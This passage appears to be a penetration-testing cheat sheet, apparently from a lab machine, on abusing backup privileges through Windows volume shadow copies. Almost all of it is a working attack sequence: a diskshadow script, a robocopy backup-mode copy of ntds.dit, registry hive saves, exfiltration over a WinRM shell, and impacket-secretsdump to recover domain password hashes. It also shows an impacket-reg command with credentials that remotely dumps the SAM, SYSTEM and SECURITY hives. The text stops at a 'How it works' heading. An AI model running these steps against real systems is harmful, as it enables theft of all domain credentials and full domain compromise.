Volume Shadow Copies

1. Quick exploitation

Privilege: the current user generally needs SeBackupPrivilege (e.g. membership in Backup Operators). robocopy /b copies in backup mode, which is what that privilege enables, so ntds.dit can be read from the snapshot regardless of its ACL.

# On the attacker box: create raj.dsh with the following contents
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh  # convert to CRLF line endings so diskshadow parses the script
# On the target, in the WinRM shell:
cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit   # /b = backup mode (SeBackupPrivilege); copy from the exposed snapshot, not from the live volume
reg save hklm\system c:\Temp\system      # the SYSTEM hive holds the boot key needed to decrypt ntds.dit
download ntds.dit
download system

Then decrypt ntds.dit offline with impacket-secretsdump, using the SYSTEM hive for the boot key:

impacket-secretsdump -ntds ntds.dit -system system local

With the same kind of backup-operator account, the SAM, SYSTEM and SECURITY hives can also be saved remotely with impacket-reg, without an interactive shell; the saved hives still have to be retrieved from the target afterwards:
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-reg  babyad.com/BACKUP-OPT:Admin123@192.168.1.5 backup -o 'C:\windows\temp\'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\windows\temp\\SAM.save
[*] Saved HKLM\SYSTEM to C:\windows\temp\\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\windows\temp\\SECURITY.save

2. How it works